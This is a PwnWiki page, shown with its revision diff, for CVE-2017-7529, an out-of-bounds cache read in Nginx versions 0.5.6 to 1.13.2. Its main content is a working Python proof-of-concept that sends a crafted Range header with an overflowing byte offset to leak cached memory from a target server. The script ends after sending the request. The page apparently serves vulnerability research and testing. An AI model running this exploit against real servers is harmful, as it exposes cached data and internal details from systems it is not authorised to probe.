Difference between revisions of "CVE-2017-7529 Nginx越界讀取緩存漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Nginx version 0.5.6 - 1.13.2 </pre> ==POC== <pre> #!/usr/bin/env python import sys import requests if len(sys....") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 34: | Line 34: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:2--> |
</translate> | </translate> | ||
http://wiki.peiqi.tech/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Nginx/Nginx%E8%B6%8A%E7%95%8C%E8%AF%BB%E5%8F%96%E7%BC%93%E5%AD%98%E6%BC%8F%E6%B4%9E%20CVE-2017-7529.html | http://wiki.peiqi.tech/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Nginx/Nginx%E8%B6%8A%E7%95%8C%E8%AF%BB%E5%8F%96%E7%BC%93%E5%AD%98%E6%BC%8F%E6%B4%9E%20CVE-2017-7529.html | ||
Latest revision as of 10:30, 23 March 2021
影響版本
Nginx version 0.5.6 - 1.13.2
POC
#!/usr/bin/env python
import sys
import requests
if len(sys.argv) < 2:
print("%s url" % (sys.argv[0]))
print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
sys.exit()
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers)
